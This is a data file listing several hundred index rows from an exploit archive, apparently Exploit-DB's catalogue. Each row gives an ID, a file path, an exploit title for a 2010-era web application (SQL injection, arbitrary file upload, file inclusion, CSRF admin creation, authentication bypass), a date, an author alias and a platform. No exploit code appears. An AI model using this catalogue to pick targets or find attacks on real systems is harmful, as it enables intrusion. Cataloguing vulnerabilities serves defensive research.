-11097,exploits/asp/webapps/11097.txt,"Egreetings 1.0b - Remote Database Disclosure",2010-01-10,ViRuSMaN,asp,webapps, -11098,exploits/asp/webapps/11098.txt,"E-membres 1.0 - Remote Database Disclosure",2010-01-10,ViRuSMaN,asp,webapps, -11101,exploits/hardware/webapps/11101.txt,"D-Link Routers - Authentication Bypass (2)",2010-01-10,"SourceSec DevTeam",hardware,webapps, -11104,exploits/php/webapps/11104.txt,"CMScontrol 7.x - Arbitrary File Upload",2010-01-11,Cyber_945,php,webapps, -11107,exploits/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,php,webapps, -11110,exploits/php/webapps/11110.txt,"Image Hosting Script - Arbitrary File Upload",2010-01-11,R3d-D3V!L,php,webapps, -11111,exploits/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps, -11113,exploits/php/webapps/11113.txt,"tincan ltd - 'section' SQL Injection",2010-01-11,ALTBTA,php,webapps, -11116,exploits/php/webapps/11116.html,"Alwjeez Script - Database Backup",2010-01-11,alnjm33,php,webapps, -11120,exploits/php/webapps/11120.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps, -11124,exploits/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps, -11126,exploits/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,php,webapps,80 -11127,exploits/php/webapps/11127.txt,"Hesk Help Desk 2.1 - Cross-Site Request Forgery",2010-01-13,The.Morpheus,php,webapps,80 -11134,exploits/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - Database Disclosure",2010-01-13,indoushka,asp,webapps, -11135,exploits/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps, -11136,exploits/php/webapps/11136.txt,"Public Media Manager - SQL Injection",2010-01-13,"learn3r hacker",php,webapps, -11140,exploits/php/webapps/11140.txt,"Joomla! Component com_articlemanager - SQL Injection",2010-01-14,FL0RiX,php,webapps, -11141,exploits/php/webapps/11141.txt,"dokuwiki 2009-12-25 - Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps, -11147,exploits/php/webapps/11147.txt,"Max's File Uploader - Arbitrary File Upload",2010-01-15,S2K9,php,webapps, -11148,exploits/php/webapps/11148.txt,"PonVFTP - Bypass / Arbitrary File Upload",2010-01-15,S2K9,php,webapps, -11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,php,webapps, -11156,exploits/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusions",2010-01-16,cr4wl3r,php,webapps, -11157,exploits/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Authentication Bypass",2010-01-16,cr4wl3r,php,webapps, -11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,php,webapps, -11159,exploits/php/webapps/11159.txt,"DasForum - 'layout' Local File Inclusion",2010-01-16,cr4wl3r,php,webapps, -11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps, -11163,exploits/php/webapps/11163.txt,"ITechSctipts Alibaba Clone - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps, -11164,exploits/php/webapps/11164.txt,"Ebay Clone from clone2009 - SQL Injection",2010-01-16,"Hamza 'MizoZ' N.",php,webapps, -11166,exploits/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (2)",2010-01-17,Stink',php,webapps, -11168,exploits/php/webapps/11168.txt,"Joomla! Component com_pc - Local File Inclusion",2010-01-17,Pyske,php,webapps, -11169,exploits/php/webapps/11169.txt,"Max's Image Uploader - Arbitrary File Upload",2010-01-17,indoushka,php,webapps, -11177,exploits/php/webapps/11177.txt,"Joomla! Component com_prime - Directory Traversal",2010-01-17,FL0RiX,php,webapps, -11178,exploits/php/webapps/11178.txt,"Joomla! Component com_libros - SQL Injection",2010-01-17,FL0RiX,php,webapps, -11183,exploits/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilities",2010-01-18,"Prashant Khandelwal",php,webapps, -11184,exploits/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",multiple,webapps, -11185,exploits/php/webapps/11185.html,"al3jeb script - Remote Change Password",2010-01-18,alnjm33,php,webapps, -11186,exploits/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",multiple,webapps, -11187,exploits/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps, -11188,exploits/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Inclusion",2010-01-18,kaMtiEz,php,webapps, -11189,exploits/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps, -11198,exploits/php/webapps/11198.txt,"al3jeb script - Remote Authentication Bypass",2010-01-19,cr4wl3r,php,webapps, -11211,exploits/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,multiple,webapps, -11212,exploits/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,asp,webapps, -11213,exploits/php/webapps/11213.txt,"Joomla! Component com_book - SQL Injection",2010-01-21,Evil-Cod3r,php,webapps, -11215,exploits/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery",2010-01-21,cp77fk4r,windows,webapps, -11216,exploits/php/webapps/11216.txt,"Blog System 1.x - 'note' SQL Injection",2010-01-21,"BorN To K!LL",php,webapps, -11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps, -11222,exploits/php/webapps/11222.txt,"Joomla! Component com_gameserver - SQL Injection",2010-01-22,B-HUNT3|2,php,webapps, -11223,exploits/php/webapps/11223.txt,"Joomla! Component com_avosbillets - SQL Injection",2010-01-22,snakespc,php,webapps, -11224,exploits/php/webapps/11224.txt,"KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2010-01-22,"Milos Zivanovic",php,webapps, -11225,exploits/php/webapps/11225.txt,"Joomla! Component com_gurujibook - SQL Injection",2010-01-22,snakespc,php,webapps, -11226,exploits/php/webapps/11226.txt,"Joomla! Component com_biographies - SQL Injection",2010-01-22,snakespc,php,webapps, -11235,exploits/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection",2010-01-23,alnjm33,php,webapps, -11236,exploits/php/webapps/11236.txt,"Joomla! Component com_ContentBlogList - SQL Injection",2010-01-23,B-HUNT3|2,php,webapps, -11237,exploits/php/webapps/11237.txt,"Joomla! Component com_casino - SQL Injection",2010-01-23,B-HUNT3|2,php,webapps, -11238,exploits/php/webapps/11238.txt,"Joomla! Component com_jbpublishdownfp - SQL Injection",2010-01-23,B-HUNT3|2,php,webapps, -11239,exploits/php/webapps/11239.txt,"Joomla! Component JBDiary - Blind SQL Injection",2010-01-23,B-HUNT3|2,php,webapps, -11240,exploits/php/webapps/11240.txt,"OpenDb 1.5.0.4 - Multiple Local File Inclusions",2010-01-23,ViRuSMaN,php,webapps, -11243,exploits/windows/webapps/11243.txt,"Joomla! Component com_mochigames - SQL Injection",2010-01-24,B-HUNT3|2,windows,webapps, -11244,exploits/php/webapps/11244.txt,"Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection",2010-01-24,cp77fk4r,php,webapps, -11249,exploits/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps, -11258,exploits/php/webapps/11258.html,"Status2k - Remote Add Admin",2010-01-25,alnjm33,php,webapps, -11261,exploits/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Arbitrary File Upload",2010-01-26,indoushka,php,webapps, -11262,exploits/php/webapps/11262.php,"Joomla! 1.5.12 - Connect Back",2010-01-26,"Nikola Petrov",php,webapps, -11263,exploits/php/webapps/11263.php,"Joomla! 1.5.12 - read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps, -11270,exploits/php/webapps/11270.txt,"Joomla! Component VirtueMart Module Customers_who_bought - SQL Injection",2010-01-27,B-HUNT3|2,php,webapps, -11271,exploits/php/webapps/11271.txt,"Joomla! Component com_virtuemart - order_status_id SQL Injection",2010-01-27,B-HUNT3|2,php,webapps, -11274,exploits/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,php,webapps, -11277,exploits/php/webapps/11277.txt,"Joomla! Component CCNewsLetter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps, -11278,exploits/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps, -11279,exploits/php/webapps/11279.txt,"Joomla! Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps, -11280,exploits/php/webapps/11280.txt,"Joomla! Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps, -11282,exploits/php/webapps/11282.txt,"Joomla! Component CCNewsLetter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps, -11284,exploits/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps, -11286,exploits/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps, -11287,exploits/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps, -11289,exploits/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps, -11290,exploits/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps, -11292,exploits/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps, -11294,exploits/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps, -11295,exploits/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,asp,webapps, -11296,exploits/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps, -11297,exploits/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)",2010-01-30,fred777,php,webapps, -11298,exploits/php/webapps/11298.txt,"dotProject 2.1.3 - Cross-Site Scripting / Improper Permissions",2010-01-30,h00die,php,webapps,80 -11299,exploits/php/webapps/11299.txt,"crownweb - 'page.cfm' SQL Injection",2010-01-31,AtT4CKxT3rR0r1ST,php,webapps, -11300,exploits/php/webapps/11300.txt,"Creative SplashWorks-SplashSite - 'page.php' Blind SQL Injection",2010-01-31,AtT4CKxT3rR0r1ST,php,webapps, -11301,exploits/php/webapps/11301.txt,"Maian Greetings 2.1 - Arbitrary File Upload",2010-01-31,indoushka,php,webapps, -11303,exploits/php/webapps/11303.txt,"Saman Portal - SQL Injection",2010-01-31,"Pouya Daneshmand",php,webapps, -11305,exploits/php/webapps/11305.txt,"ShoutCMS - 'content.php' Blind SQL Injection",2010-02-01,"Zero Cold",php,webapps, -11306,exploits/php/webapps/11306.txt,"Evernew Free Joke Script - 'viewjokes.php' SQL Injection",2010-02-01,"Hamza 'MizoZ' N.",php,webapps, -11307,exploits/php/webapps/11307.txt,"Joomla! Component Job - SQL Injection",2010-02-01,B-HUNT3|2,php,webapps, -11308,exploits/php/webapps/11308.txt,"Joomla! Component Yelp - SQL Injection",2010-02-01,B-HUNT3|2,php,webapps, -11309,exploits/php/webapps/11309.txt,"Snif 1.5.2 - Any Filetype Download",2010-02-01,Aodrulez,php,webapps, -11310,exploits/asp/webapps/11310.txt,"RaakCMS - Multiple Vulnerabilities",2010-02-01,"Pouya Daneshmand",asp,webapps, -11311,exploits/php/webapps/11311.txt,"Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)",2010-02-01,The.Morpheus,php,webapps, -11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,php,webapps, -11318,exploits/php/webapps/11318.txt,"Dlili Script - SQL Injection",2010-02-02,Dr.DaShEr,php,webapps, -11319,exploits/php/webapps/11319.txt,"MYRE Classified - 'cat' SQL Injection",2010-02-02,kaMtiEz,php,webapps, -11321,exploits/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps, -11322,exploits/php/webapps/11322.txt,"KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)",2010-02-03,"Milos Zivanovic",php,webapps, -11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",php,webapps, -11324,exploits/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps, -11325,exploits/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps, -11326,exploits/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps, -11327,exploits/php/webapps/11327.txt,"myBusinessAdmin - 'content.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps, -11329,exploits/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,php,webapps, -11330,exploits/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - 'Login.DO' SQL Injection",2010-02-04,"Asheesh Anaconda",windows,webapps, -11334,exploits/php/webapps/11334.txt,"Audistats 1.3 - SQL Injection",2010-02-05,kaMtiEz,php,webapps, -11336,exploits/php/webapps/11336.txt,"Open Bulletin Board - Multiple Blind SQL Injections",2010-02-06,AtT4CKxT3rR0r1ST,php,webapps, -11337,exploits/php/webapps/11337.txt,"Joomla! Component com_photoblog - Blind SQL Injection",2010-02-06,ALTBTA,php,webapps, -11339,exploits/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,php,webapps, -11340,exploits/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps, -11341,exploits/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,cp77fk4r,php,webapps, -11344,exploits/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,HackXBack,php,webapps, -11345,exploits/php/webapps/11345.txt,"Zen Tracking 2.2 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps, -11346,exploits/php/webapps/11346.txt,"Baal Systems 3.8 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps, -11348,exploits/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps, -11349,exploits/php/webapps/11349.txt,"Exponent CMS 0.96.3 - 'articlemodule' SQL Injection",2010-02-07,"T u R c O",php,webapps, -11350,exploits/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps, -11352,exploits/php/webapps/11352.txt,"Joomla! Component com_productbook - SQL Injection",2010-02-07,snakespc,php,webapps, -11353,exploits/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps, -11354,exploits/php/webapps/11354.txt,"Killmonster 2.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps, -11355,exploits/php/webapps/11355.txt,"EncapsCMS 0.3.6 - 'config[path]' Remote File Inclusion",2010-02-07,cr4wl3r,php,webapps, -11356,exploits/php/webapps/11356.txt,"Rostermain 1.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps, -11357,exploits/php/webapps/11357.txt,"Uiga Business Portal - SQL Injection / Cross-Site Scripting",2010-02-07,"Sioma Labs",php,webapps, -11358,exploits/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,mc2_s3lector,php,webapps, -11359,exploits/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Inclusion",2010-02-08,"Hamza 'MizoZ' N.",php,webapps, -11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,php,webapps, -11361,exploits/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,ViRuSMaN,asp,webapps, -11365,exploits/php/webapps/11365.txt,"CPA Site Solutions - Arbitrary File Upload",2010-02-09,R3VAN_BASTARD,php,webapps, -11366,exploits/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,ViRuSMaN,php,webapps, -11367,exploits/php/webapps/11367.txt,"NewsLetter Tailor - Authentication Bypass",2010-02-09,ViRuSMaN,php,webapps, -11368,exploits/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,HackXBack,php,webapps, -11369,exploits/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,cp77fk4r,asp,webapps, -11375,exploits/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps, -11376,exploits/php/webapps/11376.txt,"Fonts Site Script - Remote File Disclosure",2010-02-09,JIKO,php,webapps, -11377,exploits/php/webapps/11377.txt,"Limny 1.01 - Arbitrary File Upload",2010-02-09,JIKO,php,webapps, -11378,exploits/php/webapps/11378.txt,"NewsLetter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,php,webapps, -11380,exploits/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps, -11382,exploits/php/webapps/11382.txt,"eSmile Script - 'index.php' SQL Injection",2010-02-10,AtT4CKxT3rR0r1ST,php,webapps, -11383,exploits/php/webapps/11383.txt,"HASHE! Solutions - Multiple SQL Injections",2010-02-10,AtT4CKxT3rR0r1ST,php,webapps, -11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",php,webapps, -11393,exploits/jsp/webapps/11393.txt,"Omnidocs - SQL Injection",2010-02-11,thebluegenius,jsp,webapps, -11394,exploits/php/webapps/11394.txt,"vBulletin 3.5.2 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps, -11395,exploits/php/webapps/11395.txt,"vBulletin 3.0.0 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps, -11396,exploits/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,php,webapps, -11398,exploits/php/webapps/11398.txt,"GameRoom Script - Authentication Bypass / Arbitrary File Upload",2010-02-11,JIKO,php,webapps, -11399,exploits/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 - Database Backup Dump",2010-02-11,ViRuSMaN,php,webapps, -11401,exploits/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps, -11402,exploits/php/webapps/11402.txt,"Books/eBooks Rental Software - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps, -11403,exploits/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 -11404,exploits/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection (PoC)",2010-02-11,s4squatch,multiple,webapps,80 -11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,multiple,webapps,80 -11406,exploits/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure",2010-02-11,Phenom,windows,webapps,80 -11409,exploits/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,multiple,webapps,80 -11410,exploits/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,php,webapps, -11411,exploits/php/webapps/11411.txt,"apemCMS - SQL Injection",2010-02-11,Ariko-Security,php,webapps, -11412,exploits/php/webapps/11412.txt,"Trade Manager Script - SQL Injection",2010-02-11,JaMbA,php,webapps, -11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps, -11415,exploits/php/webapps/11415.txt,"Izumi 1.1.0 - Multiple Local File Inclusion / Remote File Inclusions",2010-02-12,cr4wl3r,php,webapps, -11416,exploits/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection",2010-02-12,Red-D3v1L,php,webapps, -11424,exploits/php/webapps/11424.txt,"CMS Made Simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps, -11425,exploits/php/webapps/11425.txt,"daChooch - SQL Injection",2010-02-12,snakespc,php,webapps, -11429,exploits/php/webapps/11429.txt,"Vito CMS - SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps, -11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,php,webapps, -11431,exploits/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps, -11434,exploits/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps, -11436,exploits/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' SQL Injection",2010-02-13,Gamoscu,php,webapps, -11437,exploits/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps, -11440,exploits/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps, -11441,exploits/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps, -11442,exploits/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusions",2010-02-14,eidelweiss,php,webapps, -11443,exploits/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps, -11444,exploits/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps, -11445,exploits/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps, -11446,exploits/php/webapps/11446.txt,"Mambo Component AkoGallery - SQL Injection",2010-02-14,snakespc,php,webapps, -11447,exploits/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps, -11449,exploits/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps, -11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,php,webapps, -11452,exploits/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection",2010-02-14,kaMtiEz,php,webapps, -11455,exploits/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps, -11456,exploits/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps, -11458,exploits/php/webapps/11458.txt,"WordPress Plugin Copperleaf Photolog 0.16 - SQL Injection",2010-02-15,kaMtiEz,php,webapps, -11460,exploits/php/webapps/11460.txt,"Dodo Upload 1.3 - Arbitrary File Upload (Bypass)",2010-02-15,indoushka,php,webapps, -11461,exploits/php/webapps/11461.txt,"CoffieNet CMS - Admin Bypass",2010-02-15,indoushka,php,webapps, -11462,exploits/php/webapps/11462.txt,"blog ink - Bypass Setting",2010-02-15,indoushka,php,webapps, -11463,exploits/php/webapps/11463.txt,"Joomla! Component com_joomportfolio - Blind Injection",2010-02-15,snakespc,php,webapps, -11464,exploits/php/webapps/11464.txt,"Joomla! Component com_hdvideoshare - SQL Injection",2010-02-15,snakespc,php,webapps, -11466,exploits/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps, -11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps, -11474,exploits/php/webapps/11474.txt,"Mambo Component 'com_acnews' - 'id' SQL Injection",2010-02-16,"Zero Bits & Xzit3",php,webapps, -11476,exploits/php/webapps/11476.txt,"SongForever.com Clone - Arbitrary File Upload",2010-02-16,indoushka,php,webapps, -11477,exploits/php/webapps/11477.txt,"Limny 2.0 - Cross-Site Request Forgery (Change Email and Password)",2010-02-16,"Luis Santana",php,webapps, -11478,exploits/php/webapps/11478.txt,"Limny 2.0 - Cross-Site Request Forgery (Create Admin User)",2010-02-16,"Luis Santana",php,webapps, -11479,exploits/php/webapps/11479.txt,"Joomla! Component com_acstartseite - SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,php,webapps, -11480,exploits/php/webapps/11480.txt,"Joomla! Component com_acprojects - SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,php,webapps, -11481,exploits/php/webapps/11481.txt,"intuitive - 'form.php' SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,php,webapps, -11482,exploits/php/webapps/11482.txt,"Nabernet - 'articles.php' SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,php,webapps, -11483,exploits/php/webapps/11483.txt,"Joomla! Component com_acteammember - SQL Injection",2010-02-17,ALTBTA,php,webapps, -11484,exploits/php/webapps/11484.txt,"uGround 1.0b - SQL Injection",2010-02-17,"Easy Laster",php,webapps, -11485,exploits/php/webapps/11485.txt,"Multiple File Attachments Mail Form Pro 2.0 - Arbitrary File Upload",2010-02-17,EgoPL,php,webapps, -11486,exploits/php/webapps/11486.txt,"PHPIDS 0.4 - Remote File Inclusion",2010-02-17,eidelweiss,php,webapps, -11487,exploits/php/webapps/11487.txt,"Auktionshaus 4 - 'news.php' SQL Injection",2010-02-17,"Easy Laster",php,webapps, -11488,exploits/php/webapps/11488.txt,"Auktionshaus Gelb 3 - 'news.php' SQL Injection",2010-02-17,"Easy Laster",php,webapps, -11489,exploits/php/webapps/11489.txt,"Erotik Auktionshaus - 'news.php' SQL Injection",2010-02-17,"Easy Laster",php,webapps, -11490,exploits/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps, -11494,exploits/php/webapps/11494.txt,"Joomla! Component com_otzivi - Local File Inclusion",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps, -11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps, -11496,exploits/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change",2010-02-18,"Sioma Labs",php,webapps, -11498,exploits/php/webapps/11498.txt,"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",php,webapps, -11502,exploits/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps, -11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps, -11504,exploits/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps, -11507,exploits/php/webapps/11507.txt,"WSC CMS - Authentication Bypass",2010-02-19,Phenom,php,webapps, -11508,exploits/php/webapps/11508.txt,"Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection",2010-02-19,NorSlacker,php,webapps, -11509,exploits/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",php,webapps, -11511,exploits/php/webapps/11511.txt,"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,php,webapps, -11515,exploits/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,php,webapps, -11516,exploits/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)",2010-02-20,ViRuSMaN,php,webapps, -11517,exploits/php/webapps/11517.txt,"Netzbrett - Database Disclosure",2010-02-20,ViRuSMaN,php,webapps, -11518,exploits/php/webapps/11518.txt,"Softbiz Jobs - 'news_desc' SQL Injection",2010-02-22,BAYBORA,php,webapps, -11519,exploits/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps, -11521,exploits/php/webapps/11521.txt,"Ero Auktion 2.0 - 'news.php' SQL Injection",2010-02-22,"Easy Laster",php,webapps, 